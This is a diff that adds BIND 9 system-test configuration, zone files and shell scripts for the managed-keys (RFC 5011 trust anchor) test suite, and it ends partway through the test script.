/dev/null +++ b/bin/tests/system/mkeys/ns3/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; + bindkeys-file "managed.conf"; + trust-anchor-telemetry no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "broken.conf"; diff --git a/bin/tests/system/mkeys/ns4/named.conf.in b/bin/tests/system/mkeys/ns4/named.conf.in new file mode 100644 index 0000000..f72c081 --- /dev/null +++ b/bin/tests/system/mkeys/ns4/named.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation auto; + bindkeys-file "managed.conf"; + managed-keys-directory "nope"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "sub.foo" { + type primary; + file "sub.foo.db.signed"; +}; diff --git a/bin/tests/system/mkeys/ns4/sign.sh b/bin/tests/system/mkeys/ns4/sign.sh new file mode 100644 index 0000000..13d7640 --- /dev/null +++ b/bin/tests/system/mkeys/ns4/sign.sh @@ -0,0 +1,25 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=sub.foo +zonefile=sub.foo.db + +keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk $zone) +zskkeyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $zone) + +$SIGNER -Sg -o $zone $zonefile > /dev/null 2>/dev/null +keyfile_to_initial_ds $keyname > private.conf +cp private.conf ../ns5/private.conf diff --git a/bin/tests/system/mkeys/ns4/sub.foo.db b/bin/tests/system/mkeys/ns4/sub.foo.db new file mode 100644 index 0000000..7bc3104 --- /dev/null +++ b/bin/tests/system/mkeys/ns4/sub.foo.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +sub.foo. IN SOA marka.isc.org. ns.foo. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +sub.foo. NS ns.sub.foo. +ns.sub.foo. A 10.53.0.4 diff --git a/bin/tests/system/mkeys/ns5/foo.db b/bin/tests/system/mkeys/ns5/foo.db new file mode 100644 index 0000000..092a1c3 --- /dev/null +++ b/bin/tests/system/mkeys/ns5/foo.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +foo. IN SOA marka.isc.org. ns.foo. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +foo. NS ns.foo. +ns.foo. A 10.53.0.5 +sub.foo. NS ns.sub.foo. +ns.sub.foo. A 10.53.0.4 diff --git a/bin/tests/system/mkeys/ns5/named.conf.in b/bin/tests/system/mkeys/ns5/named.conf.in new file mode 100644 index 0000000..8af1a46 --- /dev/null +++ b/bin/tests/system/mkeys/ns5/named.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation auto; + bindkeys-file "managed.conf"; + servfail-ttl 0; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "foo" { + type primary; + file "foo.db"; +}; + +include "island.conf"; +include "private.conf"; diff --git a/bin/tests/system/mkeys/ns5/named1.args b/bin/tests/system/mkeys/ns5/named1.args new file mode 100644 index 0000000..c4c8a55 --- /dev/null +++ b/bin/tests/system/mkeys/ns5/named1.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/mkeys/ns5/named2.args b/bin/tests/system/mkeys/ns5/named2.args new file mode 100644 index 0000000..3fd830a --- /dev/null +++ b/bin/tests/system/mkeys/ns5/named2.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=2/20/40 diff --git a/bin/tests/system/mkeys/ns6/named.args b/bin/tests/system/mkeys/ns6/named.args new file mode 100644 index 0000000..65a8fca --- /dev/null +++ b/bin/tests/system/mkeys/ns6/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=5/10/20 diff --git a/bin/tests/system/mkeys/ns6/named.conf.in b/bin/tests/system/mkeys/ns6/named.conf.in new file mode 100644 index 0000000..ff8137a --- /dev/null +++ b/bin/tests/system/mkeys/ns6/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; + trust-anchor-telemetry no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "managed.conf"; diff --git a/bin/tests/system/mkeys/ns6/setup.sh b/bin/tests/system/mkeys/ns6/setup.sh new file mode 100644 index 0000000..1bfdc7f --- /dev/null +++ b/bin/tests/system/mkeys/ns6/setup.sh @@ -0,0 +1,34 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +zonefile=root.db + +# a key for a trust island +islandkey=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk island.) + +# a key with unsupported algorithm +unsupportedkey=Kunknown.+255+00000 +cp unsupported-managed.key "${unsupportedkey}.key" + +# root key +rootkey=$(cat ../ns1/managed.key) +cp "../ns1/${rootkey}.key" . + +# Configure the resolving server with an initializing key. +# (We use key-format trust anchors here because otherwise the +# unsupported algorithm test won't work.) +keyfile_to_initial_keys $unsupportedkey $islandkey $rootkey > managed.conf diff --git a/bin/tests/system/mkeys/ns6/unsupported-managed.key b/bin/tests/system/mkeys/ns6/unsupported-managed.key new file mode 100644 index 0000000..be872a0 --- /dev/null +++ b/bin/tests/system/mkeys/ns6/unsupported-managed.key @@ -0,0 +1 @@ +unsupported. IN DNSKEY 257 3 255 BOOVAhiJDPqhfU7+yGXjhetrtC/rtjmwO1yo52BUHUd8R4hQ/ZPdYCVvQlvNkRxDblPkFM5YRXkesS30pJSoNYrg+djbMNumJrLG+lbhFIc/ahTjlYOxb1zm2z00ubHju/1uGBifiRvKWSK0Vr0u6NtS4PKZfsnXt+piSHiRAHSfkjGHwqPYYKh9EUW12kJmIzlMaM6WYl+gJOvL+f8VqNLtvsMPT6OPK/3h/Dnfnxyeudp/jzAnNDDiTgX2XfzIXB4UwxtzIOGaHLnprpNf3zoBm0kyaEdSQQ/qKkpCOqjBasYEHRjVz3RncPUkdLr7PQuPBfFDr3SUMMJqufJrO4IJjtD4cCBT7K1i39Jg471nEzU1vkPzxF+Rw1QHT4nZaXbltf3BEZGS4Knoe9XPwi5KjGW6 diff --git a/bin/tests/system/mkeys/ns7/named.conf.in b/bin/tests/system/mkeys/ns7/named.conf.in new file mode 100644 index 0000000..2c0d69e --- /dev/null +++ b/bin/tests/system/mkeys/ns7/named.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS7 + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation auto; + bindkeys-file "managed.conf"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view view1 { + zone "." { + type hint; + file "../../common/root.hint"; + }; +}; + +view view2 { + zone "." { + type hint; + file "../../common/root.hint"; + }; +}; diff --git a/bin/tests/system/mkeys/setup.sh b/bin/tests/system/mkeys/setup.sh new file mode 100644 index 0000000..b110094 --- /dev/null +++ b/bin/tests/system/mkeys/setup.sh @@ -0,0 +1,45 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. + +export ALGORITHM_SET="ecc_default" +. $SYSTEMTESTTOP/conf.sh + +# Ensure the selected algorithm set is okay. +if [ "$ALGORITHM_SET" = "error" ]; then + echofail "Algorithm selection failed." >&2 + exit 1 +fi + +copy_setports ns1/named1.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf + +cp ns5/named1.args ns5/named.args + +( cd ns1 && $SHELL sign.sh ) +( cd ns4 && $SHELL sign.sh ) +( cd ns6 && $SHELL setup.sh ) + +cp ns2/managed.conf ns2/managed1.conf + +cd ns4 +mkdir nope +touch nope/managed-keys.bind +touch nope/managed.keys.bind.jnl +chmod 444 nope/* diff --git a/bin/tests/system/mkeys/tests.sh b/bin/tests/system/mkeys/tests.sh new file mode 100644 index 0000000..5999e21 --- /dev/null +++ b/bin/tests/system/mkeys/tests.sh @@ -0,0 +1,885 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +export ALGORITHM_SET="ecc_default" +#shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() ( + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "${PORT}" "$@" +) + +delv_with_opts() ( + "$DELV" -a ns1/trusted.conf -p "${PORT}" "$@" +) + +rndccmd() ( + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "${CONTROLPORT}" -s "$@" +) + +mkeys_reconfig_on() ( + nsidx=$1 + rndccmd "10.53.0.${nsidx}" reconfig . | sed "s/^/ns${nsidx} /" | cat_i +) + +mkeys_reload_on() ( + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndc_reload "ns${nsidx}" "10.53.0.${nsidx}" + wait_for_log 20 "loaded serial" "ns${nsidx}"/named.run || return 1 +) + +mkeys_loadkeys_on() ( + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndccmd "10.53.0.${nsidx}" loadkeys . | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "next key event" "ns${nsidx}"/named.run || return 1 +) + +mkeys_refresh_on() ( + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndccmd "10.53.0.${nsidx}" managed-keys refresh | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "Returned from key fetch in keyfetch_done()" "ns${nsidx}"/named.run || return 1 +) + +mkeys_sync_on() ( + # No race with mkeys_refresh_on() is possible as even if the latter + # returns immediately after the expected log message is written, the + # managed-keys zone is already locked and the command below calls + # dns_zone_flush(), which also attempts to take that zone's lock + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndccmd "10.53.0.${nsidx}" managed-keys sync | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "dump_done" "ns${nsidx}"/named.run || return 1 +) + +mkeys_status_on() ( + # No race with mkeys_refresh_on() is possible as even if the latter + # returns immediately after the expected log message is written, the + # managed-keys zone is already locked and the command below calls + # mkey_status(), which in turn calls dns_zone_getrefreshkeytime(), + # which also attempts to take that zone's lock + nsidx=$1 + rndccmd "10.53.0.${nsidx}" managed-keys status +) + +mkeys_flush_on() ( + nsidx=$1 + rndccmd "10.53.0.${nsidx}" flush | sed "s/^/ns${nsidx} /" | cat_i +) + +mkeys_secroots_on() ( + nsidx=$1 + rndccmd "10.53.0.${nsidx}" secroots | sed "s/^/ns${nsidx} /" | cat_i +) + +original=$(cat ns1/managed.key) +originalid=$(cat ns1/managed.key.id) + +status=0 +n=1 + +rm -f dig.out.* + +echo_i "check for signed record ($n)" +ret=0 +dig_with_opts +norec example. @10.53.0.1 TXT > dig.out.ns1.test$n || ret=1 +grep "^example\.[[:space:]]*[0-9]*[[:space:]]*IN[[:space:]]*TXT[[:space:]]*\"This is a test\.\"" dig.out.ns1.test$n > /dev/null || ret=1 +grep "^example\.[[:space:]]*[0-9]*[[:space:]]*IN[[:space:]]*RRSIG[[:space:]]*TXT[[:space:]]" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check positive validation with valid trust anchor ($n)" +ret=0 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +if [ -x "$DELV" ]; then + n=$((n+1)) + ret=0 + echo_i "check positive validation using delv ($n)" + delv_with_opts @10.53.0.1 txt example > delv.out$n || ret=1 + grep "; fully validated" delv.out$n > /dev/null || ret=1 # redundant + grep "example..*TXT.*This is a test" delv.out$n > /dev/null || ret=1 + grep "example..*.RRSIG..*TXT" delv.out$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +fi + +n=$((n+1)) +echo_i "check for failed validation due to wrong key in managed-keys ($n)" +ret=0 +dig_with_opts +noauth example. @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns3.test$n > /dev/null && ret=1 +grep "opcode: QUERY, status: SERVFAIL, id" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check new trust anchor can be added ($n)" +ret=0 +standby1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk -K ns1 .) +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# there should be two keys listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# one indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one indicates pending trust +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check new trust anchor can't be added with bad initial key ($n)" +ret=0 +mkeys_refresh_on 3 || ret=1 +mkeys_status_on 3 > rndc.out.$n 2>&1 || ret=1 +# there should be one key listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one line indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# ... and the key is not trusted +count=$(grep -c "no trust" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "remove untrusted standby key, check timer restarts ($n)" +ret=0 +mkeys_sync_on 2 || ret=1 +t1=$(grep "trust pending" ns2/managed-keys.bind) || true +$SETTIME -D now -K ns1 "$standby1" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. +sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +# trust pending date must be different +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "restore untrusted standby key, revoke original key ($n)" +t1=$t2 +$SETTIME -D none -K ns1 "$standby1" > /dev/null +$SETTIME -R now -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. +sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# trust is revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# trust is still pending on the standby key +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# pending date moved forward for the standby key +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "refresh managed-keys, ensure same result ($n)" +t1=$t2 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. +sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# trust is revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# trust is still pending on the standby key +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# pending date moved forward for the standby key +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "restore revoked key, ensure same result ($n)" +t1=$t2 +$SETTIME -R none -D now -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +$SETTIME -D none -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. +sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# trust is revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# trust is still pending on the standby key +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# pending date moved forward for the standby key +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "reinitialize trust anchors, add second key to bind.keys" +stop_server --use-rndc --port "${CONTROLPORT}" ns2 +rm -f ns2/managed-keys.bind* +keyfile_to_initial_ds ns1/"$original" ns1/"$standby1" > ns2/managed.conf +nextpart ns2/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns2 + +n=$((n+1)) +echo_i "check that no key from bind.keys is marked as an initializing key ($n)" +ret=0 +wait_for_log 20 "Returned from key fetch in keyfetch_done()" ns2/named.run || ret=1 +mkeys_secroots_on 2 || ret=1 +grep '; initializing' ns2/named.secroots > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "reinitialize trust anchors, revert to one key in bind.keys" +stop_server --use-rndc --port "${CONTROLPORT}" ns2 +rm -f ns2/managed-keys.bind* +mv ns2/managed1.conf ns2/managed.conf +nextpart ns2/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns2 + +n=$((n+1)) +echo_i "check that standby key is now trusted ($n)" +ret=0 +wait_for_log 20 "Returned from key fetch in keyfetch_done()" ns2/named.run || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both indicate current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke original key, add new standby ($n)" +ret=0 +standby2=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk -K ns1 .) +$SETTIME -R now -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# three keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# one is revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# three lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# one indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one indicates revoked trust +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one indicates trust pending +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke standby before it is trusted ($n)" +ret=0 +standby3=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk -K ns1 .) +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 +# four keys listed +count=$(grep -c "keyid: " rndc.out.1.$n) || true +[ "$count" -eq 4 ] || { echo_i "keyid: count ($count) != 4"; ret=1; } +# one revoked +count=$(grep -c "trust revoked" rndc.out.1.$n) || true +[ "$count" -eq 1 ] || { echo_i "trust revoked count ($count) != 1"; ret=1; } +# two pending +count=$(grep -c "trust pending" rndc.out.1.$n) || true +[ "$count" -eq 2 ] || { echo_i "trust pending count ($count) != 2"; ret=1; } +$SETTIME -R now -K ns1 "$standby3" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.2.$n 2>&1 || ret=1 +# now three keys listed +count=$(grep -c "keyid: " rndc.out.2.$n) || true +[ "$count" -eq 3 ] || { echo_i "keyid: count ($count) != 3"; ret=1; } +# one revoked +count=$(grep -c "trust revoked" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || { echo_i "trust revoked count ($count) != 1"; ret=1; } +# one pending +count=$(grep -c "trust pending" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || { echo_i "trust pending count ($count) != 1"; ret=1; } +$SETTIME -D now -K ns1 "$standby3" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait 20 seconds for key add/remove holddowns to expire ($n)" +ret=0 +sleep 20 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# none revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 0 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both indicate current trust +count=$(grep -c "trusted 